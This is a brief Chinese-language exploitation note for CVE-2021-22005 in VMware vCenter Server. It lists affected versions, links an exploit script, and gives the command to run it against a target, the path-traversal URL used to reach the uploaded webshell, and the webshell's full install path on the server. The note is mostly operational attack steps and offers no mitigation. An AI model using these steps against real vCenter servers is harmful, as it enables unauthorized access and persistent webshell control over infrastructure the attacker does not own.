CVE-2021-22005

影响范围

• vCenter Server 7.0 < 7.0 U2c build-18356314
• vCenter Server 6.7 < 6.7 U3o build-18485166
• Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
• Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
• 6.7 vCenters Windows版本不受影响

漏洞利用

https://github.com/rwincey/CVE-2021-22005/blob/main/CVE-2021-22005.py

python cve-2021-22005.py -t https://x.x.x.x

连接webshell

https://x.x.x.x/idm/..;/test.jsp

上传后的webshell完整路径为

/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/xx.jsp